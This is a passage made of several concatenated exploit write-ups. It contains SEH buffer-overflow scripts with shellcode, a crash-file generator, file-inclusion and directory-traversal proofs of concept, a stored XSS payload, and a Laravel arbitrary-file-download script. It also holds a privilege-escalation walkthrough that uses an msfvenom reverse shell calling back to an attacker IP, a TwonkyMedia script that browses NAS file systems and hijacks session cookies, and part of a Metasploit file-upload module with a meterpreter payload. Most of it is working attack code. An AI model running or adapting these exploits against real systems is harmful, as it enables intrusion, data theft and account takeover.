shellcode += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78"
shellcode += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15"
shellcode += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a"
shellcode += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05"
shellcode += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b"
shellcode += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26"
shellcode += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82"
shellcode += "\x8e\x2a\x79\xdb"
# Layout of the overlong user name, in order: filler up to the exception
# handler record, the 4-byte next-handler field (a short jump), the handler
# pointer, then the payload padded with NOPs on both sides.
# The 988-byte filler matches the Windows 10 offset given in the header; the
# header lists different offsets for XP SP3 and Windows 7.
# NOTE(review): the handler pointer is taken from the bundled SkinMagic.dll,
# which suggests that module is built without SafeSEH/ASLR - confirm. The
# vendor-side fix is a length check on the user-name field plus rebuilding the
# bundled modules with those mitigations enabled.
buffer = "A" * 988 # Junk
buffer += "\xeb\x14\x90\x90" # + nSEH (Jump Code)
buffer += struct.pack('<L', 0x10037b11) # + SEH (pop ebx # pop eax # ret | [SkinMagic.dll])
buffer += "\x90" * 50 # + NOP
buffer += shellcode # + shellcode
buffer += "\x90" * 50 # + NOP
# Write the string to OpenMe.txt in the current directory.
# NOTE(review): the bare except reports every error as "File cannot be
# created", and the handle is not closed if write() raises.
try:
f=open("OpenMe.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
#!/usr/bin/python
###########################################################################################
# Exploit Title : Easy Avi Divx Xvid to DVD Burner v2.9.11 - Local Denial of Service #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.divxtodvd.net/index.htm #
# Vulnerable Software: http://www.divxtodvd.net/easy_divx_to_dvd.exe #
# Tested on OS : Windows XP professional SP3 #
# Windows 10 professional 64-bit #
# Steps to reproduce : Add Evil.AVI and BOOM! #
###########################################################################################
# Writes Evil.AVI: 500 "A" characters and nothing else, so the file carries an
# .AVI name without any container structure. The header states that adding the
# file to the application triggers the crash.
# NOTE(review): presumably the application parses the file without validating
# the container header first - confirm against the vendor's parser.
buffer = "A" * 500
# NOTE(review): the bare except reports every error as "File cannot be
# created", and the handle is not closed if write() raises.
try:
f=open("Evil.AVI","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
Product: Site Editor Wordpress Plugin - https://wordpress.org/plugins/site-editor/
Vendor: Site Editor
Tested version: 1.1.1
CVE ID: CVE-2018-7422
** CVE description **
A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
** Technical details **
In site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP’s require_once(). This parameter can be controlled by an attacker and is not properly sanitized.
Vulnerable code:
if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){
require_once $_REQUEST['ajax_path'];
}
https://plugins.trac.wordpress.org/browser/site-editor/trunk/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?rev=1640500#L5
By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.
** Proof of Concept **
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
** Solution **
No fix available yet.
** Timeline **
03/01/2018: author contacted through siteeditor.org's contact form; no reply
16/01/2018: issue report filed on the public GitHub page with no technical details
18/01/2018: author replies and says he replied to our e-mail 8 days ago (we could not find the aforementioned e-mail at all); author sends us "another" e-mail
19/01/2018: report sent; author says he will fix this issue "very soon"
31/01/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply
14/02/2018: WP Plugins team contacted; no reply
06/03/2018: vendor contacted; no reply
07/03/2018: vendor contacted; no reply
15/03/2018: public disclosure
** Credits **
Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).
--
Best Regards,
Nicolas Buzy-Debat
Orange Cyberdefense Singapore (CERT-LEXSI)
# Exploit Title: MyBB Last User's Threads in Profile Plugin v1.2 - Persistent XSS
# Date: 3/19/2018
# Author: 0xB9
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]protonmail.com
# Software Link: https://community.mybb.com/mods.php?action=view&pid=910
# Version: v1.2
# Tested on: Ubuntu 17.10
1. Description:
Display last threads in user profile.
2. Proof of Concept:
Persistent XSS
- Create a thread with the following subject <p """><SCRIPT>alert("XSS")</SCRIPT>">
- Now visit your profile to see the alert.
3. Solution:
Patch: https://github.com/vintagedaddyo/MyBB_Plugin_Last-User-s-Threads-in-Profile/commit/5e3b81450d0bf7935885db2622f1a42e5961258d
# SWAMI KARUPASAMI THUNAI
#
###############################################################################
# Exploit Title: Stack Based Buffer Overflow in Allok Fast AVI MPEG Splitter 1.2 (Windows XP SP3)
# Date: 06-03-2018
# Exploit Author: Mohan Ravichandran & Velayutham Selvaraj
# Organization : TwinTech Solutions
# Vulnerable Software: Allok Fast AVI MPEG Splitter 1.2
# Vendor Homepage: http://www.alloksoft.com
# Version: 1.2
# Software Link: http://www.alloksoft.com/allok_vconverter.exe
# Tested On: Windows XP Service Pack 3 (Version 2002) & windows 7 x64 Ultimate
#
# Credit to Velayutham Selvaraj for discovering the Vulnerability
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ...
#1. Download and install the "setup(allok_fast_avimpegsplitter.exe)" file
#2. Run this exploit code via python 2.7
#3. A file "exploit.txt" will be created
#4. Copy the contents of the file and paste in the License Name field
# Name > exploit.txt
#5. Type some random character in License Code
#6. Click Register and voila !
#7. Boom calculator opens
#
##############################################################################
import struct
# Builds exploit.txt, the string the header says to paste into the
# "License Name" field of the registration dialog.
# NOTE(review): "file" shadows the Python 2 builtin of the same name, and the
# handle is opened before the data is built, so an error further down leaves
# it unclosed.
file = open("exploit.txt","wb")
# Total length of the generated string; the tail is padded with "D" up to this.
buflen = 4000
# Filler that precedes the exception handler record.
junk = "A" * 780
# Next-handler field: two NOPs followed by a short jump.
nseh = "\x90\x90\xeb\x10"
# Handler pointer, packed little-endian.
# NOTE(review): the module this address belongs to is not stated here; a fixed
# usable address implies a module loaded without SafeSEH/ASLR - confirm.
seh = struct.pack("<L",0x10019A09)
nops = "\x90" * 20
# The below shellcode will open calculator, but can be modified by need.
shellcode = ""
shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
shellcode +="\xc4\xd9"
# Assemble the pieces in order, then pad to buflen bytes.
exploit = junk + nseh + seh + nops + shellcode
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
file.write(buf)
file.close()
# Exploit Title: Laravel log viewer by rap2hpoutre local file download (LFD)
# Date: 23/02/2018
# Exploit Author: Haboob Team
# Software Link: https://github.com/rap2hpoutre/laravel-log-viewer/tree/v0.11.1
# Version: v0.12.0 and below
# CVE : CVE-2018-8947
1. Description
An unauthorized user can access Laravel log viewer by rap2hpoutre and use its download function to download any file readable with Laravel's permissions, by supplying the base64-encoded path of the wanted file.
2. Proof of Concept
#After providing the url of the vulnerable laravel log viewer by rap2hpoutre (with / in the end or you can edit it yourself), and the file wanted including "../" the script will create a folder and save the downloaded file there
import os
import base64
from urllib2 import urlopen, URLError, HTTPError
import argparse
import cookielib
# Command-line interface: -u is the base URL of the application, -f the path
# of the file to request.
parser = argparse.ArgumentParser(description='_0_ Laravel 0Day _0_')
parser.add_argument("-u", action="store", dest="url", help="Target URL", required=True)
parser.add_argument("-f", action="store", dest="file", help="Target File", required=True)
args = parser.parse_args()
# The log viewer's download endpoint: the "dl" query parameter of /logs/.
url = str(args.url).strip()+"/logs/?dl="
final_file= args.file
# Downloads are stored in ./0Grats0 under the last path component of -f.
if not os.path.exists("./0Grats0"):
os.makedirs("./0Grats0")
word = str(args.file).split('/')
word1= "./0Grats0/"+word[-1]
# The requested path is sent base64-encoded as the "dl" value. For defenders:
# the pattern to look for in access logs is /logs/?dl=<base64> where the
# decoded value contains "../"; the fix named below is upgrading to v0.13.0.
finalee=url+base64.b64encode(final_file)
# Fetch the response body and write it to the local file; HTTP and URL errors
# are printed together with the requested URL.
try:
f = urlopen(finalee)
with open(word1, "wb") as local_file:
local_file.write(f.read())
except HTTPError, e:
print "HTTP Error:", e.code, finalee
except URLError, e:
print "URL Error:", e.reason, finalee
3. Solution:
Update to version v0.13.0
https://github.com/rap2hpoutre/laravel-log-viewer/releases/tag/v0.13.0
Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: LabF nfsAxe 3.7 - Privilege Escalation
Date: 03-24-2018
Vulnerable Software: LabF nfsAxe 3.7
Vendor Homepage: http://www.labf.com/
Version: 3.7
Software Link: http://www.labf.com/download/nfsaxe.exe
Tested On: Windows 7 x86 and x64 *Requires Windows 7 Public Sharing to be enabled
Details:
By default LabF nfsAxe 3.7 installs to "C:\Users\Public\Program Files\LabF.com\nfsAxe" and installs
a service called "XwpXSetSrvnfsAxe service". To start this service an executable "xsetsrv.exe"
is located in the same directory and also runs under Local System.
By default in Windows with Public Folder sharing enabled, the permissions on any file/folder under "C:\Users\Public\" is Full Control
for Everyone. This means unprivileged users have the ability to add, delete, or modify any and all
files/folders.
Exploit:
1. Generate malicious .exe on attacking machine
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.0.149 LPORT=443 -f exe > /var/www/html/xsetsrv.exe
2. Setup listener and start apache on attacking machine
nc -nlvvp 443
service apache2 start
3. Download malicious .exe on victim machine
Open browser to http://192.168.0.149/xsetsrv.exe and download
4. Rename C:\Users\Public\Program Files\LabF.com\nfsAxe\xsetsrv.exe
xsetsrv.exe > xsetsrv.bak
5. Copy/Move downloaded xsetsrv.exe file to C:\Users\Public\Program Files\LabF.com\nfsAxe\
6. Restart victim machine and login as unprivileged user
7. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system
Prerequisites:
To successfully exploit this vulnerability, an attacker must already have access
to a system running a LabF nfsAxe installed at the default location using a
low-privileged user account
Risk:
The vulnerability allows local attackers to escalate privileges and execute
arbitrary code as Local System aka Game Over.
Fix:
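Don't use the default install path; install to a directory that unprivileged users cannot modify, since the service executable there runs as Local System.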
# Exploit Title: Acrolinx Dashboard Directory Traversal
# CVE: CVE 2018-7719
# Date: 19.02.2017
# Exploit Author: Berk Dusunur
# Vendor Homepage: www.acrolinx.com
# Version:Before 5.2.5
PoC
Acrolinx dashboard windows works on the server.
http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html
'''
---------------------------------------------------------------------
1. About
---------------------------------------------------------------------
# Exploit Title: TwonkyMedia Server 7.0.11-8.5 Directory Traversal
# Date: 2018-03-27
# Exploit Author: Sven Fassbender
# Contact: https://twitter.com/mezdanak
# Vendor Homepage: http://www.lynxtechnology.com/home
# Software Link: https://twonky.com/downloads/index.html
# Version: 7.0.11-8.5
# CVE : CVE-2018-7171
# Category: webapps
---------------------------------------------------------------------
2. Background information
---------------------------------------------------------------------
"With Twonky from Lynx Technology, you can quickly discover your media libraries of digital videos,
photos and music in your home, control them from mobile devices, and enjoy them on connected screens and speakers.
Twonky Server is the industry leading DLNA/UPnP Media Server from Lynx Technology that enables sharing media content
between connected devices. Twonky Server is used worldwide and is available as a standalone server
(end user installable, e.g. for PCs/Macs) or an embedded server for devices such as NAS, routers/gateways and STBs.
Twonky Server’s web UI provides optimal capability for you to easily and reliably control and play back your
media files in a variety of ways, and to “beam” those media files to other connected devices." --extract from https://twonky.com
Previous similar vulnerabilities:
https://packetstormsecurity.com/files/112227/PacketVideo-TwonkyServer-TwonkyMedia-Directory-Traversal.html
Fix:
https://docs.twonky.com/display/TRN/Twonky+Server+7.0.x
Statistics:
Around 20800 publicly available TwonkyMedia Servers are listed on shodan.io worldwide. (https://www.shodan.io/search?query=twonky)
Rarely protected by password (only around 2%).
Top Countries:
1. United States
2. Germany
3. Korea
4. Russian Federation
5. France
6. Italy
7. Taiwan
8. Poland
9. Hungary
10. United Kingdom
TwonkyMedia Server seems to be pre-installed on a huge range of NAS devices. For example the following NAS devices:
Thecus N2310
Thecus N4560
WDMyCloud,
MyCloudEX2Ultra,
WDMyCloudEX4,
WDMyCloudEX2100,
QNAP,
Zyxel NAS326,
Zyxel NAS542,
Zyxel NSA310,
Zyxel NSA310S,
Zyxel NSA320,
Zyxel NSA325-v2
...
Other devices:
Belkin routers
Zyxel EMG2926-Q10A
...
---------------------------------------------------------------------
3. Vulnerability description
---------------------------------------------------------------------
TwonkyMedia Server has a function which allows browsing parts of the file system, that are marked as shares by the user.
By setting the "contentdir" parameter to "/../" with the rpc call "set_all", an attacker can discover the filesystem outside of the user specified shares:
HTTP request:
POST /rpc/set_all HTTP/1.1
Host: 192.168.188.9:9000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.188.9:9000/
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 228
Connection: close
contentdir=/../
Now one can discover the file system with requests like the following:
HTTP request:
GET /rpc/dir?path=/ HTTP/1.1
Host: 192.168.188.9:9000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.188.9:9000/webconfig
X-Requested-With: XMLHttpRequest
Connection: close
HTTP response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 128
Date: Sat, 03 Feb 2018 09:31:28 GMT
Accept-Ranges: bytes
Connection: close
Expires: 0
Pragma: no-cache
Cache-Control: no-cache
EXT:
Server: Linux/2.x.x, UPnP/1.0, pvConnect UPnP SDK/1.0, Twonky UPnP SDK/1.1
001D/
002D/bin
003D/boot
004D/CacheVolume
005D/DataVolume
006D/dev
007D/etc
008D/home
009D/lib
010D/media
011D/mnt
012D/nfs
013D/opt
014D/proc
015D/root
016D/run
017D/sbin
018D/shares
019D/srv
020D/sys
021D/system
022D/tmp
023D/usr
024D/var
---------------------------------------------------------------------
4. Proof of Concept
---------------------------------------------------------------------
https://github.com/mechanico/sharingIsCaring/blob/master/twonky.py
---------------------------------------------------------------------
5. Attack Scenarios
---------------------------------------------------------------------
- TwonkyMedia Server path traversal vs. WD MyCloud
Files whose names correspond to PHPSESSID admin cookies were discovered in the /tmp/ directory of a WDMyCloud NAS device:
$ python twonky.py 192.168.188.9 9000
https://www.shodan.io/host/192.168.188.9
*** Port 9000 opened ***
Run Twonky browser on port 9000 [Y, N]? [Y]
*** Get Serverdetails from Twonky ***
Server Name: WDMyCloud
Serverplatform: armel_gcc473_glibc215_64k
Pictures shared: 0
Videos shared: 0
Twonky Version: 7.2.9-6
Build date: 03/25/2015 (mm/dd/yyyy)
*** 'contentbase' path set to '/'' ***
path nr:
------------------------------
[...]
022 Dir /tmp
[...]
------------------------------
path nr: 022
------------------------------
[...]
059 Fil sess_c61ufnntn31o2ovuj0ncf8fkp1
[...]
Valid WDMyCloud cookie discovered: {'PHPSESSID': 'c61ufnntn31o2ovuj0ncf8fkp1'}
------------------------------
path nr:
This cookie can be used to access the WDMyCloud Rest-Api. (http://ip/api/2.1/rest/...)
With this access an attacker can e.g., create/modify users, download all files accessible by the user, update Firmware, ...
- TwonkyMedia Server path traversal vs. privacy
People may store sensitive information on their NAS devices.
Such as:
- Business information
- Health records
- Passwords
- Credit Cards
- Passports
- Curricula vitae
- Invoices Business/Private
- "Private" photos
- Illegal material
- ...
- DMCA protected information
There may also be DMCA protected information publicly available.
Such as:
- Movies
- Music
---------------------------------------------------------------------
6. Fix
---------------------------------------------------------------------
All TwonkyMedia Server versions between 7.0.11 -> 8.5 have been tested as vulnerable.
While writing this advisory 8.5 is the latest version available:
https://twonky.com/downloads/index.html
---------------------------------------------------------------------
'''
import urllib3
import sys
import socket
import requests
from colorama import init, Fore
# Silence urllib3's InsecureRequestWarning: the HTTPS fallbacks below call
# requests with verify=False, i.e. without certificate verification.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# colorama: reset the colour after every print.
init(autoreset=True)
# Extend KEYWORDS, list if you want. This will highlight files and directory names that include a keyword.
# Entries are upper case because keywordDetector upper-cases the name before matching.
KEYWORDS = ["CRYPTO", "CRIPTO", "BITCOIN", "WALLET"]
def keywordDetector(line):
    """Return True when `line`, upper-cased, contains any entry of KEYWORDS.

    The match is a plain substring test, so it is case-insensitive only for
    keywords that are themselves stored in upper case. Returns False when no
    keyword occurs in the line.
    """
    return any(keyword in line.upper() for keyword in KEYWORDS)
# Return True if a TCP connection to host:port can be opened, False on any
# exception.
# NOTE(review): settimeout(2) is called after connect(), so it does not bound
# the connection attempt itself; the socket is shut down but never close()d;
# the bare except also turns a non-numeric port into a plain False.
def checkPort(host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,int(port)))
s.settimeout(2)
s.shutdown(2)
return True
except:
return False
# POST "contentbase=/../" to /rpc/set_all on the server, first over HTTP and,
# on a connection error, over HTTPS without certificate verification.
# Returns True when the server answers 200; exits the process on a non-200
# answer or on a ChunkedEncodingError, both of which the script reports as
# password protection being active.
# NOTE(review): the advisory text's sample request names the parameter
# "contentdir", this code sends "contentbase"; detection rules for POSTs to
# /rpc/set_all carrying "/../" should cover both spellings.
# NOTE(review): after the ReadTimeout branch "response" is never assigned, so
# the status check that follows would raise NameError - indentation was lost
# in this listing, confirm the nesting against the original script.
def setContentBase(host, port):
payload = "\ncontentbase=/../\n"
url = "http://{0}:{1}/rpc/set_all".format(host, port)
try:
response = requests.post(url, data=payload, timeout=5)
except requests.exceptions.ReadTimeout:
print (Fore.RED + "*** Timeout while setting contentbase path to '/' ***")
except requests.exceptions.ChunkedEncodingError:
print (Fore.RED + "*** 'contentbase' cannot be modified, password protection active ***")
sys.exit()
except requests.exceptions.ConnectionError:
url = "https://{0}:{1}/rpc/set_all".format(host, port)
response = requests.post(url, data=payload, timeout=5, verify=False)
if response.status_code != 200:
print (Fore.RED + "*** 'contentbase' cannot be modified, password protection active ***")
print (Fore.YELLOW + "*** You should try to login with admin:admin (default creds) ***")
sys.exit()
else:
print (Fore.MAGENTA + "*** 'contentbase' path set to '/'' ***")
return True
# Print the server's friendly name and selected fields of /rpc/info_status,
# and return the version string found there.
# Both requests are tried over HTTP first and repeated over HTTPS without
# certificate verification when the connection fails. A non-200 answer to
# /rpc/get_friendlyname ends the process.
# NOTE(review): fields are recognised by substring match on each line and the
# value is taken as the second "|"-separated element. If no line contains
# "version", versionNumber is never assigned and the return statement raises.
def serverInfo(host, port):
print (Fore.MAGENTA + "*** Get Serverdetails from Twonky ***")
try:
url = "http://{0}:{1}/rpc/get_friendlyname".format(host, port)
friendlyname = requests.get(url, timeout=5)
except requests.exceptions.ConnectionError:
url= "https://{0}:{1}/rpc/get_friendlyname".format(host, port)
friendlyname = requests.get(url, timeout=5, verify=False)
if friendlyname.status_code == 200:
print (Fore.GREEN + "Server Name: {0}".format(friendlyname.text))
else:
print (Fore.RED + "*** Not authorized to edit settings, password protection active ***")
sys.exit()
try:
url = "http://{0}:{1}/rpc/info_status".format(host, port)
infoStatus = requests.get(url, timeout=5)
except requests.exceptions.ConnectionError:
url = "https://{0}:{1}/rpc/info_status".format(host, port)
infoStatus = requests.get(url, timeout=5, verify=False)
# One "name|value" record per line; empty lines are skipped.
for line in infoStatus.iter_lines():
if line :
if line.find("version") != -1:
lineSplited = line.split("|")
versionNumber = lineSplited[1]
print (Fore.GREEN + "Twonky Version: {0}".format(versionNumber))
elif line.find("serverplatform") != -1:
lineSplited = line.split("|")
serverPlatform = lineSplited[1]
print (Fore.GREEN + "Serverplatform: {0}".format(serverPlatform))
elif line.find("builddate") != -1:
lineSplited = line.split("|")
buildDate = lineSplited[1]
print (Fore.GREEN + "Build date: {0}".format(buildDate))
elif line.find("pictures") != -1:
lineSplited = line.split("|")
pictureCount = lineSplited[1]
print (Fore.GREEN + "Pictures shared: {0}".format(pictureCount))
elif line.find("videos") != -1:
lineSplited = line.split("|")
videoCount = lineSplited[1]
print (Fore.GREEN + "Videos shared: {0}".format(videoCount))
return versionNumber
# Test whether a session file name maps to a session the device still accepts.
# cookieString is a name such as "sess_<id>"; the part after the first "_" is
# sent as PHPSESSID to http://<host>/api/2.1/rest/device_user (no port given,
# plain HTTP). Returns the cookie dict on a 200 answer, otherwise False.
# NOTE(review): only element [1] of the "_" split is used, so an id that
# itself contains "_" would be truncated.
# NOTE(defense): this check works because the session file name equals the
# session id, so read access to that directory amounts to access to live
# sessions; presumably short session lifetimes reduce the window - confirm.
def checkSessionCookie(host, cookieString):
url = "http://{0}/api/2.1/rest/device_user".format(host)
cookieTemp = cookieString.split("_")
cookie = {'PHPSESSID': cookieTemp[1]}
response = requests.get(url, timeout=10, cookies=cookie)
if response.status_code == 200:
return cookie
else:
return False
# Interactive loop: read a value at the "path nr: " prompt, request the
# matching /rpc/dir listing and print it; typing "exit" ends the process.
# The URL form depends on the first character of the version string
# ("?path=" for "8", "/path=" otherwise). HTTP is tried first, HTTPS without
# certificate verification on a connection error.
# In each listing line the fourth character marks the entry type: "D" is
# printed as " Dir ", "F" as " Fil ". Names matching KEYWORDS are printed in
# red; file entries whose text at [8:13] is "sess_" are passed to
# checkSessionCookie, and a cookie it accepts is reported after the listing.
# NOTE(review): the typed value is placed in the URL without encoding, and
# indentation was lost in this listing - confirm the else-branch nesting
# against the original script.
def browser(host, port, version):
while True:
var = raw_input("path nr: ")
if var != "exit" :
if version[0] == "8":
url = "http://{0}:{1}/rpc/dir?path={2}".format(host, port, var)
else:
url = "http://{0}:{1}/rpc/dir/path={2}".format(host, port, var)
try:
response = requests.get(url, timeout=5)
except requests.exceptions.ConnectionError:
if version[0] == "8":
url = "https://{0}:{1}/rpc/dir?path={2}".format(host, port, var)
else:
url = "https://{0}:{1}/rpc/dir/path={2}".format(host, port, var)
response = requests.get(url, timeout=5, verify=False)
print "-" * 30
validCookieString = ""
for line in response.iter_lines():
if line :
if len(line) > 3:
if line[3] == "D":
line = line[:4].replace("D", " Dir ") + line[4:]
if keywordDetector(line[4:]):
print (Fore.RED + line)
else:
print (Fore.GREEN + line)
elif line[3] == "F":
line = line[:4].replace("F", " Fil ") + line[4:]
if keywordDetector(line[4:]):
print (Fore.RED + line)
elif line[8:13] == "sess_":
print line
validCookie = checkSessionCookie(host, line[8:])
if validCookie != False:
validCookieString = validCookie
else:
print line
else:
print line
if len(validCookieString) >= 1:
print (Fore.RED + "Valid WDMyCloud cookie discovered: {0}".format(validCookieString))
print "-" * 30
elif var == "exit":
sys.exit()
#*** Program start here ***
# Entry point: expects exactly two arguments, the address and the port.
# Prints a shodan.io link for the address, checks that the port accepts a TCP
# connection, asks for confirmation (anything but "N" continues), then runs
# serverInfo, setContentBase and the interactive browser in that order.
# NOTE(review): neither argument is validated before use; nothing is printed
# when the port check fails.
if __name__ == '__main__':
if len(sys.argv) != 3:
print "Usage: $ " + sys.argv[0] + " [IP_adress] [port]"
else:
host = sys.argv[1]
print (Fore.MAGENTA + "https://www.shodan.io/host/{0}".format(host))
port = sys.argv[2]
if checkPort(host, port):
print (Fore.GREEN + "*** Port {0} opened ***".format(port))
twonky = raw_input("Run Twonky browser on port {0} [Y, N]? [Y] ".format(port))
if twonky.upper() != "N":
version = serverInfo(host, port)
if setContentBase(host, port):
browser(host, port, version)
##
# This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
##
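# Metasploit module for the unauthenticated file upload in ClipBucket's
# actions/beats_uploader.php (EDB 44250).
#
# The module description states that versions before 4.0.0 (Release 4902) are
# affected, so upgrading to that release or later is the remedy it implies.
# The traffic this module produces is an unauthenticated multipart POST to
# actions/beats_uploader.php followed by a GET for a .php file below
# actions/<file_directory>/; both are usable as log and WAF signatures.
#
# NOTE(review): the description text says "/action/beats_uploader.php" while
# every request below uses "actions"; the description string is left as is.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Registers the module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => "ClipBucket beats_uploader Unauthenticated Arbitrary File Upload",
      'Description' => %q{
        This module exploits a vulnerability found in ClipBucket versions before 4.0.0 (Release 4902).
        A malicious file can be uploaded using an unauthenticated arbitrary file upload vulnerability.
        It is possible for an attacker to upload a malicious script to issue operating system commands.
        This issue is caused by improper session handling in /action/beats_uploader.php file.
        This module was tested on ClipBucket before 4.0.0 - Release 4902 on Windows 7 and Kali Linux.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'www.sec-consult.com', # Vulnerability Discovery, PoC
          'Touhid M.Shaikh <admin[at]touhidshaikh.com>' # Metasploit module
        ],
      'References' =>
        [
          [ 'EDB', '44250' ]
        ],
      'DefaultOptions' =>
        {
          'SSL' => false,
          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
          'Encoder' => 'php/base64'
        },
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'Targets' =>
        [
          ['Clipbucket < 4.0.0 - Release 4902', {}]
        ],
      'Privileged' => false,
      'DisclosureDate' => "Mar 03 2018",
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
      ])
  end

  # @return [String] path component of the configured TARGETURI
  def uri
    target_uri.path
  end

  # Non-intrusive detection: looks for the application's readme and for the
  # uploader script. Nothing is uploaded.
  #
  # @return [CheckCode] Unknown when a request gets no response, Safe when
  #   either resource is missing, Appears when both answer with 200
  def check
    vprint_status('Trying to detect ClipBucket on target.')

    # check for readme file
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'readme')
    })

    unless res
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end

    unless res.code == 200 && res.body.include?('ClipBucket')
      vprint_error('Could not find readme')
      return CheckCode::Safe
    end

    # check for beats_uploader.php file
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'actions', 'beats_uploader.php')
    })

    unless res
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end

    unless res.code == 200
      vprint_error('Could not find beats_uploader.php')
      return CheckCode::Safe
    end

    # Same constant namespace as the other return values in this method.
    CheckCode::Appears
  end

  # Uploads the payload through beats_uploader.php, registers the stored file
  # for cleanup and requests it once.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the target does not answer
  #   or the upload is not acknowledged with success == 'yes'
  def exploit
    # generate the PHP meterpreter payload
    stager = '<?php '
    stager << payload.encode
    stager << '?>'

    # Setting POST data. Arguments are positional: data, content type,
    # transfer encoding, content disposition.
    post_data = Rex::MIME::Message.new
    post_data.add_part(stager, 'application/octet-stream', nil, 'form-data; name="file"; filename="pfile.php"') # payload
    post_data.add_part('1', nil, nil, 'form-data; name="plupload"') # require for uploading
    post_data.add_part('agent22.php', nil, nil, 'form-data; name="name"')
    data = post_data.to_s

    print_status('Uploading payload..')
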